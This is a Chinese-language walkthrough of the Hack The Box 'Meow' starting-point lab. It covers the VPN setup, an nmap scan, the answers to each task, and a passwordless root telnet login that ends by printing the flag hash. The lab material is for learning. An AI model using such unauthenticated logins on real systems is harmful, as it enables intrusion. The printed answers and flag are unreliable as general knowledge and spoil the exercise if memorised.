寫在前面,雖然第0關(Meow)很簡單,但是對於從來沒接觸過此類題目的同學可能一開始有些發蒙,因此這里將詳細的相關解題步驟都貼出來以供參考。
建議選擇使用Kali Linux作為滲透測試平台,在Hackthebox網站(https://hackthebox.com/)注冊賬號以后,按照下述的步驟進行解題:
第一步:在Kali Linux安裝openvpn,比較簡單:
# apt install openvpn
第二步:在Hackthebox網站上開始第0關解題,按照步驟,首先進行連接,在連接之前需要下載VPN配置文件,如下圖所示:
下載VPN配置文件后,可將該配置文件移到root目錄
第三步:利用openvpn以及所下載的VPN配置文件進行連接,如果沒有報錯即表明連接成功:
#openvpn staring_point_jasonhuawen.ovpn
(配置文件名稱會根據每個人賬號不同而不同)
連接成功以后,在Hackthebox網站上即顯示已連接,並且給出目標的IP地址(綠色字體部分),用戶可重啟或者重置該目標機器。
第四步:由於不清楚目標運行什么服務,因此用nmap進行掃描,根據掃描結果可以得知,該目標僅運行telnet服務(這點很重要).
第五步:回到Hackthebox網站繼續答題,相對來說都是比較簡單的題目:
Task 1:What does the acronym VM stand for?
答案:virtual machine (提交答案,如果錯誤,會有提示)
Task 2: What tool do we use to interact with the operating system in order to start our VPN connection?
答案:Terminal
Task 3: What service do we use to form our VPN connection?
答案:Openvpn
Task 4: What is the abreviated name for a tunnel interface in the output of your VPN boot-up sequence output?
答案:tun (從ifconfig 或者openvpn建立連接時的輸出也可以得到答案)
Task 5: What tool do we use to test our connection to the target?
答案:Ping
Task 6: What is the name of the tool we use to scan the target's ports?
答案:nmap (掃描神器)
Task 7: What service do we identify on port 23/tcp during our scans?
思路:用namp掃描一下目標即可知道開放的端口以及相應的服務。
#nmap -sS 10.129.1.17 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-29 23:44 EDT Nmap scan report for 10.129.1.17 Host is up (0.19s latency). Not shown: 999 closed tcp ports (reset) PORT STATE SERVICE 23/tcp open telnet
答案:Telnet
Task 8: What username ultimately works with the remote management login prompt for the target?
思路:由於目標只運行一種服務:telnet,那就試試咯,結果發現root竟然沒讓輸入密碼即可登陸了:
└─# telnet 10.129.1.17 Trying 10.129.1.17... Connected to 10.129.1.17. Escape character is '^]'. ls^M █ █ ▐▌ ▄█▄ █ ▄▄▄▄ █▄▄█ ▀▀█ █▀▀ ▐▌▄▀ █ █▀█ █▀█ █▌▄█ ▄▀▀▄ ▀▄▀ █ █ █▄█ █▄▄ ▐█▀▄ █ █ █ █▄▄ █▌▄█ ▀▄▄▀ █▀█ Meow login: root Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Wed 30 Mar 2022 03:58:49 AM UTC System load: 0.0 Usage of /: 41.7% of 7.75GB Memory usage: 4% Swap usage: 0% Processes: 136 Users logged in: 0 IPv4 address for eth0: 10.129.1.17 IPv6 address for eth0: dead:beef::250:56ff:feb9:4ed * Super-optimized for small spaces - read how we shrank the memory footprint of MicroK8s to make it the smallest full K8s around. https://ubuntu.com/blog/microk8s-memory-optimisation 75 updates can be applied immediately. 31 of these updates are standard security updates. To see these additional updates run: apt list --upgradable The list of available updates is more than a week old. To check for new updates run: sudo apt update Last login: Mon Sep 6 15:15:23 UTC 2021 from 10.10.14.18 on pts/0
Submit root flag
因為畢竟是第0關,所以比較簡單,用telnet登陸以后,ls列出目錄文件,結果發現flag.txt就在那里,都不用麻煩的搜索。
root@Meow:~# ls flag.txt snap root@Meow:~# cat flag.txt b40abdfe23665f766f9c61ecba8a4c19
